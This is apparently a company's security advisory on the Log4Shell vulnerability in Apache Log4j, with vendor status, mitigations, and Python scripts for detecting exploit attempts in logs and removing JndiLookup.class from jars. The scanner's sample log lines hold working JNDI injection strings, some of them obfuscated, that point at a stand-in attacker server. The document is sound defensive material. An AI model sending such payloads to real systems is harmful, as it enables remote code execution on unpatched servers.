06/09/2022
Ultima have been made aware of a critical vulnerability affecting Apache Log4j. It is rated 10.0 on the CVSS scale, the highest severity a vulnerability can be given. MITRE's CVE record for CVE-2021-44228 is the reference entry for the vulnerability:
CVE – CVE-2021-44228 (mitre.org)
What is Log4j & how is it being attacked?
Log4j is an open-source Java logging library from the Apache Software Foundation, embedded in a huge range of software, from websites to server-based applications, to write log data. The vulnerability, widely known as Log4Shell, is in the message lookup feature of Log4j 2 (versions 2.0-beta9 to 2.14.1): if a string such as ${jndi:ldap://<attacker host>/a} ends up in a logged message, Log4j performs a JNDI lookup against the attacker's server, which can return a reference that makes the JVM load and run attacker-supplied code. Exploitation therefore does not require direct access to the server. An attacker only needs to get the crafted string into something the application logs, for example an HTTP User-Agent header, a username on a login form or a chat message, and the affected host must be able to connect out to the attacker's LDAP or RMI server.
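As an added illustration of the attack pattern above (editor-supplied example code, not part of the original Ultima post or any vendor tooling), the following Python script flags web-server log lines that carry a ${jndi:...} lookup, including the URL-encoded and nested-lookup obfuscations (${lower:...}, ${upper:...}, ${name:-default}) that were used in the wild to slip past naive string matching. The log lines, the IP addresses (RFC 5737 documentation ranges) and the function names are constructed for the example.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup: a body with no nested '${' or '}' inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")

# What we are hunting for, matched only after de-obfuscation.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Constructed sample access-log lines (Apache combined format).
LOG_LINES = [
    '198.51.100.7 - - [11/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [11/Dec/2021:10:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '203.0.113.5 - - [11/Dec/2021:10:01:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.5:1389/a}"',
    '203.0.113.5 - - [11/Dec/2021:10:01:05 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F203.0.113.5%3A1099%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.5 - - [11/Dec/2021:10:01:06 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://203.0.113.5:1389/a}"',
    '198.51.100.9 - - [11/Dec/2021:10:01:07 +0000] "GET /docs?q=${date:yyyy} HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]


def _resolve(m):
    """Evaluate one innermost lookup the way Log4j 2 would, for the lookups
    that matter for obfuscation; anything else is left untouched."""
    body = m.group(1)
    kind, _, arg = body.partition(":")
    kind = kind.strip().lower()
    if kind == "jndi":
        return m.group(0)              # this is the payload itself; keep it intact
    if kind == "lower":
        return arg.lower()
    if kind == "upper":
        return arg.upper()
    if ":-" in body:                   # ${name:-default}: Log4j substitutes the default
        return body.split(":-", 1)[1]  # when 'name' cannot be resolved (covers ${::-j})
    return m.group(0)                  # unknown lookup such as ${date:...}; leave as-is


def normalize(text, max_rounds=20):
    """Collapse innermost lookups repeatedly until the string stops changing."""
    for _ in range(max_rounds):
        new = _INNER.sub(_resolve, text)
        if new == text:
            return text
        text = new
    return text


def is_log4shell_attempt(line):
    """True if the line carries a ${jndi:...} lookup, even if URL-encoded or nested."""
    return bool(_JNDI.search(normalize(unquote(line))))


def scan(lines):
    """Indices of the lines that look like exploitation attempts."""
    return [i for i, line in enumerate(lines) if is_log4shell_attempt(line)]


if __name__ == "__main__":
    for i in scan(LOG_LINES):
        print("suspect line %d: %s" % (i, normalize(unquote(LOG_LINES[i]))))
```

Run it over an access log to triage which sources attempted exploitation and what they tried to load. Obfuscation is open-ended (double URL-encoding, Base64-wrapped payloads inside the lookup, other lookup types), so a hit is reliable evidence of an attempt while a miss is not evidence of none; pair it with monitoring of unexpected outbound LDAP, RMI and HTTP connections from the hosts that received the requests.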
Where has the vulnerability been detected?
Whilst the full extent of the products and services affected is unknown, our close vendors and partners are working through the impact statements now. An update from our strategic vendors can be found below:
| Vendor | Product vulnerability status (from the vendor, as of 13 December 2021) | Details | Link for more info |
|---|---|---|---|
| Check Point | Not vulnerable | Has released an IPS update to help mitigate the risk | Check Point response to Apache Log4j Remote Code Execution (CVE-2021-44228) |
| Cisco | Some products vulnerable. A large product list is being reviewed by Cisco: some are confirmed not vulnerable, others confirmed vulnerable, and some are still under evaluation | Refer to the link for more details | https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd |
| Citrix | None announced as vulnerable so far, but many under investigation. Some confirmed not vulnerable (e.g. some ADC variants, XenServer); others in progress | Citrix Security Advisory for Apache CVE-2021-44228 | |
| VMware | Some products vulnerable. Some confirmed vulnerable (e.g. ESXi, vCenter) with a workaround available; others in progress | Workarounds are available and patches are pending | https://www.vmware.com/security/advisories/VMSA-2021-0028.html |
| Microsoft | No evidence so far that any Microsoft service is vulnerable; the biggest risk is customer applications and services running on a Microsoft platform such as Azure IaaS | Microsoft is working on WAF managed rulesets to help protect; Defender signatures are being updated | https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/ ; Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation – Microsoft Security Blog |
| HPE | None announced as vulnerable so far, but all under investigation | HPE are investigating and will publish more information on their security vulnerability pages (see links) | Document – Notice: Apache Software Log4j – Security Vulnerability CVE-2021-44228 (HPE Support, hpe.com); Aruba Security Advisories (arubanetworks.com) |
| HP | No information published at this time | | |
| Nutanix | Some products vulnerable. Some are vulnerable with a patch pending; others under investigation | Nutanix WAF products have rules to help filter attempted exploits | Security Advisory 23-v1.3 (nutanix.com) |
If you would like to learn more about the vulnerability, a Blue Team cheatsheet has been published on GitHub, which you can find here:
BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-12 2204 UTC · GitHub
How can I protect my systems?
- Update where you can – Log4j 2.15.0 was released to mitigate the remote code execution vulnerability (later Log4j releases have since superseded it; follow Apache's current advisory for the version to deploy). Where you cannot update the library directly, vendors whose products embed Log4j, such as Ubiquiti for UniFi, have started shipping updated releases that address the threat.
- If you're a developer – On Log4j 2.10 to 2.14.1 the vulnerable lookup feature can be disabled by setting the JVM system property log4j2.formatMsgNoLookups=true (or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true). Older 2.x versions do not honour that property; there the library-level mitigation is to remove the JndiLookup class (org/apache/logging/log4j/core/lookup/JndiLookup.class) from the log4j-core jar on the classpath. Either change should only be made once you are sure of the implications and a comprehensive implementation and test plan has been created and executed.
- Implement a next-generation IPS – Products such as Check Point firewalls with Intrusion Prevention System capabilities enabled have been updated with signatures to block this exploit. Treat this as a compensating control rather than a fix: signatures can be evaded by obfuscated payloads, so patching is still required.
- Bolster network security – Because this vulnerability also affects key infrastructure products such as VMware vCenter, set up access control lists or firewall rules so that management interfaces are reachable only from approved management devices. Egress filtering matters just as much: exploitation relies on the vulnerable host connecting out to the attacker's LDAP, RMI or HTTP server, so blocking unsolicited outbound connections from servers breaks the attack chain even before a patch is applied.
- Refer to guidance from the NCSC for this vulnerability – The National Cyber Security Centre have published guidance, available here – https://www.ncsc.gov.uk/news/apache-log4j-vulnerability
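The developer mitigation above, as an added worked example (editor-supplied Python, not Ultima's, Apache's or any vendor's own tooling): the script walks a directory tree, reads the log4j-core version from each jar's Maven pom.properties, checks whether JndiLookup.class is still present, and rewrites exposed jars without that class, which is the Apache-documented fallback for 2.x versions where the formatMsgNoLookups property is not honoured. The jars built in demo() are constructed stand-in fixtures with placeholder class bytes, and the version threshold is the 2.15.0 release recommended above; the function names are this example's own.

```python
import os
import re
import tempfile
import zipfile

# Entries inside log4j-core-*.jar that the assessment relies on.
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def log4j_core_version(jar_path):
    """Version string from the Maven pom.properties, or None if this is not log4j-core."""
    with zipfile.ZipFile(jar_path) as zf:
        if POM_PROPERTIES not in zf.namelist():
            return None
        for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                return line.split("=", 1)[1].strip()
    return None


def is_vulnerable_version(version):
    """CVE-2021-44228 affects Log4j 2.x from 2.0-beta9 up to 2.14.1. Pre-release
    qualifiers are ignored, which errs on the side of flagging a jar."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version or "")
    if not m:
        return False
    major, minor, patch = int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)
    return major == 2 and (minor, patch) < (15, 0)


def assess_jar(jar_path):
    """Version and class-presence facts for one jar; 'exposed' needs both."""
    version = log4j_core_version(jar_path)
    with zipfile.ZipFile(jar_path) as zf:
        has_class = JNDI_LOOKUP_CLASS in zf.namelist()
    vulnerable = is_vulnerable_version(version)
    return {
        "path": jar_path,
        "version": version,
        "vulnerable_version": vulnerable,
        "jndi_lookup_present": has_class,
        "exposed": vulnerable and has_class,
    }


def find_jars(root):
    """Every .jar under root that is a real zip archive. Jars nested inside
    WAR/EAR files and shaded copies of Log4j are not opened: treat them as a gap."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name.endswith(".jar") and zipfile.is_zipfile(path):
                yield path


def strip_jndi_lookup(jar_path):
    """Rewrite the jar in place without JndiLookup.class (a zip cannot be edited
    in situ, so every other entry is copied to a temporary archive first)."""
    tmp_path = jar_path + ".tmp"
    with zipfile.ZipFile(jar_path) as src, zipfile.ZipFile(tmp_path, "w") as dst:
        for info in src.infolist():
            if info.filename != JNDI_LOOKUP_CLASS:
                dst.writestr(info, src.read(info.filename))
    os.replace(tmp_path, jar_path)


def build_sample_jar(path, version):
    """Constructed fixture: a stand-in jar holding only the two entries the
    assessment reads. The class entry is a placeholder, not real bytecode."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr(POM_PROPERTIES, "groupId=org.apache.logging.log4j\n"
                    "artifactId=log4j-core\nversion=%s\n" % version)
        zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe placeholder")


def demo():
    """Assess a tree, strip the class from exposed jars, then assess again."""
    with tempfile.TemporaryDirectory() as root:
        lib = os.path.join(root, "app", "lib")
        os.makedirs(lib)
        build_sample_jar(os.path.join(lib, "log4j-core-2.14.1.jar"), "2.14.1")
        build_sample_jar(os.path.join(lib, "log4j-core-2.15.0.jar"), "2.15.0")
        before = {os.path.basename(p): assess_jar(p)["exposed"] for p in find_jars(root)}
        for p in list(find_jars(root)):
            if assess_jar(p)["exposed"]:
                strip_jndi_lookup(p)
        after = {os.path.basename(p): assess_jar(p)["exposed"] for p in find_jars(root)}
        return before, after


if __name__ == "__main__":
    print(demo())
```

Run assess_jar over real artefacts before stripping anything, and only strip on a copy you can roll back: the jar is modified in place and the JVM must be restarted to pick up the change. Note that 2.15.0 still ships JndiLookup.class (with the lookup restricted), which is why the script keys on the version rather than on the class's mere presence; and because nested and shaded copies are not opened, a clean result from find_jars is not proof that nothing on the host is vulnerable.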
Are you an Ultima Managed Services customer?
As your security experts, we have already been working through every internal application and service, and we will update this blog as we receive further updates from our vendors. In the meantime, we have carried out the following remediation:
- Where customers have a managed firewall service, we have ensured that your firewall's IPS signatures are updated to help prevent the exploit
- Our monitoring platform has been confirmed as not vulnerable by the vendor
Ultima Labs Statement
As our IA-Cloud platform is built on Microsoft Azure services, it has no third-party integrations that could be vulnerable.
If you remain concerned about the vulnerability, please contact our Security Team, who will be on hand to assist you.
17th DECEMBER UPDATE
What are Ultima doing to address the vulnerability within their systems?
Upon identification of the issue, we immediately undertook a review of all of our systems, in partnership with our vendors, to identify any systems that could potentially be vulnerable. We verified that our next-generation firewalls and perimeter security solutions were able to detect and block activity related to Log4j exploitation.
Are any of Ultima’s systems vulnerable?
Any systems that were deemed vulnerable by the vendor have been remediated by implementing the approved solution from the vendor and have been validated via an internal vulnerability scan.
I’m a managed service customer, are any of your systems used to provide these services vulnerable?
None of the key solutions we use to deliver our managed services are vulnerable. As many of our customers run an on-premise collector as part of the monitoring platform, we have also shared the statement from LogicMonitor – Log4Shell Security Vulnerability (CVE-2021-44228) | LogicMonitor